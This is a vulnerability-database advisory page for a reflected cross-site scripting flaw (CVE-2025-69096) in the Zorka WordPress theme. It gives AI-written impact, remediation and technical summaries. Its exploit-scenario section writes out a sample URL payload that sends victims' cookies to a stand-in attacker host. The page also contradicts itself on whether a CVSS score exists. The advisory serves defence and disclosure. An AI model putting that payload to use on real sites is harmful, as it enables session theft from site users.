Vulnerability Assessment
| Weakness |
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK
2 techniques across 2 tactics: Initial Access, Execution The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up. |
| Impact | While a CVSS score and EPSS probability are not available for this CVE, the risk should be considered moderate to high based on the following signals: (1) the attack vector is Network with no authentication required (typical of reflected XSS), suggesting broad exploitability; (2) the CWE-79 classification is a well-understood and frequently exploited vulnerability class with numerous public POCs and automated detection tools available; (3) the vulnerability affects a WordPress theme, which runs on millions of websites, increasing the potential attack surface; (4) no KEV (Known Exploited Vulnerability) status has been assigned, indicating no evidence of active real-world exploitation at the time of analysis, though this may change; (5) Patchstack's confirmation suggests the vulnerability has been responsibly disclosed and likely has a patch available. The lack of CVSS metrics and EPSS data limits quantitative risk modeling, but reflected XSS vulnerabilities are generally prioritized below stored XSS due to the user interaction requirement, yet still warrant prompt remediation due to their ease of exploitation and potential for credential theft or session hijacking. |
| Exploit ScenarioDerived | An attacker crafts a malicious URL such as 'https://victim-site.com/?search=<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>' and sends it to a user via email or social media, disguising it as a legitimate link. When the victim clicks the link, the Zorka theme reflects the unsanitized script parameter directly into the HTML response, causing the JavaScript to execute in the victim's browser with full access to session cookies, local storage, and the ability to perform authenticated actions on the site. The attacker's server logs the victim's session cookie, which can then be used to impersonate the user or administrator account. Since this is reflected XSS with no stored component, the attack requires social engineering to trick the user into visiting the malicious URL, but no POC or active exploitation in the wild has been documented at this time. |
Get an e-mail when this CVE is exploited, patched or re-scored. Free account.
Alert meAnalysisAIv1 – Mar 25, 2026
G5Theme Zorka WordPress theme versions up to and including 1.5.7 contain a Reflected Cross-Site Scripting (XSS) vulnerability that fails to properly neutralize user input during web page generation. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, allowing the attacker to execute arbitrary JavaScript in the victim's browser session, potentially stealing session cookies, credentials, or performing actions on behalf of the user. No CVSS score, EPSS probability, or KEV status has been assigned, but the vulnerability is confirmed by Patchstack with a clear attack vector.
RemediationAI
The primary remediation is to upgrade G5Theme Zorka to a version newer than 1.5.7 immediately; check the vendor advisory at Patchstack (https://patchstack.com/database/Wordpress/Theme/zorka/vulnerability/wordpress-zorka-theme-1-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve) for the specific patched version available. Until patching is completed, implement defense-in-depth measures including: enforce Content Security Policy (CSP) headers to restrict inline script execution and external script loading; deploy a Web Application Firewall (WAF) to detect and block common XSS payloads in query parameters and form data; apply WordPress security hardening such as disabling direct script access and restricting plugin/theme permissions; and educate users not to click suspicious links from untrusted sources. Additionally, consider applying input validation and output encoding at the application level by reviewing the theme code and ensuring all user-controlled variables are properly sanitized with WordPress functions like sanitize_text_field() and escaped with esc_html() or esc_attr() before rendering.
Affected VersionsENISA
Affects your stack
Find out whether the stacks and servers you run are on an affected version.
Checking this CVE against your own stacks and servers is part of the Basic plan and up.
Technical ContextAI · show details
The vulnerability exists in the G5Theme Zorka WordPress theme (identified via CPE cpe:2.3:a:g5theme:zorka:*:*:*:*:*:*:*:*) and represents a classic CWE-79 Improper Neutralization of Input During Web Page Generation flaw. Specifically, the theme fails to sanitize or encode user-supplied input before rendering it in HTTP responses, allowing attacker-controlled data to be interpreted as executable code within the browser context. This is a reflected XSS vulnerability, meaning the malicious payload is passed through the request itself (typically via URL query parameters or form data) rather than stored server-side, making it suitable for phishing campaigns where victims must be tricked into accessing a crafted link. The root cause is insufficient use of WordPress security functions such as sanitize_text_field(), wp_kses_post(), or esc_html() at the point where user input is rendered in HTML/JavaScript contexts.
Know when Zorka gets its next vulnerability
- Watch products and get an email when something new is published
- Check this CVE against your own stack and servers
- Exploit and PoC references, threat intelligence from 22 sources
No credit card · 7-day full trial
Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
DescriptionCVE.org
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in G5Theme Zorka zorka allows Reflected XSS.This issue affects Zorka: from n/a through <= 1.5.7.
Executive ViewAI
CVE-2025-69096 presents moderate security risk, a cross-site scripting vulnerability rated CVSS 7.1. Attackers could inject malicious scripts to steal user sessions, credentials, or perform actions on behalf of authenticated users. Organizations should apply vendor updates when available and consider compensating controls in the interim.
Apply vendor patch. If immediate patching is not feasible: (1) Implement Content-Security-Policy headers; (2) Enable HttpOnly and SameSite cookie attributes; (3) Deploy WAF XSS/CSRF rules.
Threat Intelligence Overview
How this decision was reached
The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.
What every action level means
SSVC AssessmentENISA
Priority Score
Attack Technique
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
EUVD-2025-208997
GHSA-8mwf-fh3g-cqp9
NVD
CVE.org
EPSS
Vulnrichment
VulDB
Exploit-DB